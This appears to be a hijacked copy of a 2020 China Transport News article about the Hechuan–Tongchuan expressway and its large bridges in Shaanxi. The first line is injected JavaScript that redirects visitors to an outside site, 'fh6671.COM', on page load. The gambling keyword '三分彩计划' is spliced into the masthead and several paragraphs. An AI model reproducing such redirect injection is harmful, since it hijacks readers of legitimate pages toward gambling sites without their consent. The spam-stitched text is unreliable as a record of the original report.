function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

这条路织就渭北高原致富金腰带

2020-11-16 16:17:06 来源:中国交通新闻网 作者:记者 白秋薇 通讯员 李伟功 文 杨江涛 图

虽是深秋,萧瑟的陕西渭北高原却连日天气晴好,77岁的郭南京又坐在村头看起了“风景”——88米高的路村河特大桥合龙了,跨沟越壑1.6公里,很是雄伟。自开建以来,村前的这座桥、这条路就成了白水县郭畔村村民郭南京和乡亲们茶余饭后的话题。久居山村,郭南京最远的出门是去年被儿子带着去了趟省城西安,外面世界和大桥建设让他感叹“世事变化太快了!”

三分彩计划随着陕西合阳至铜川高速公路的通车,郭南京身边还将发生更多变化:两地车程将由两个半小时缩短为约一个小时,出行更便捷;郭畔村1600亩苹果以及整个渭北果业、铜川的煤炭资源多了一条东西向的大通道,外运更畅通。

由中国铁建投资集团投资建设的合铜高速公路全长130高速公里,是陕西省政府确定的首个交通基础设施PPP项目,路线穿越两市七个县区,其中的六个均为刚摘帽不久的贫困县区。这条高速公路桥梁多达67座,仅墩高在80米以上的高墩大跨桥梁就有13座。站在高152米的王家河特大桥上看去,白色的拉索琴弦一样竖立在蓝天下,周边机器轰鸣,焊花四溅,约400名工人日夜不停进行挂篮施工。王家河特大桥是目前国内最大联跨矮塔斜拉桥,为塔墩梁固结刚构体系的五塔六跨矮塔斜拉桥,全长2030米,其中主桥长1170米,最高墩144米,最大总高度188.5米,结构极为复杂。桥墩设计为异型双肢双向渐变空心薄壁墩,即墩身为八面体,桥墩、连续刚构及斜拉索施工难度大。“我们采取安全系数最高的全封闭液压自动爬模施工工艺,液压爬模节省模板倒运及安装时间,加快施工进度,同时为应对墩身异型渐变的施工难题,采用易于裁剪且重复利用率最高的维萨板作为墩身模板,顺利完成桥墩施工。”该特大桥项目总工程师李抱介绍说。

合铜高速公路于2017年6月21日开工建设,也是陕西省2020年底实现“县县通高速”重点项目。目前,合铜高速公路全线桥梁工程基本完工,今年年底将建成通车,届时将形成贯穿陕西、山西、河南、山东等省区东西向跨省高速出海大通道,也形成了横穿陕西省关中北部地区的一条公路运输大通道,对加密关中区域路网、分流连霍高速公路交通压力、充分发挥高速公路网整体效益等方面具有十分重要的作用。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。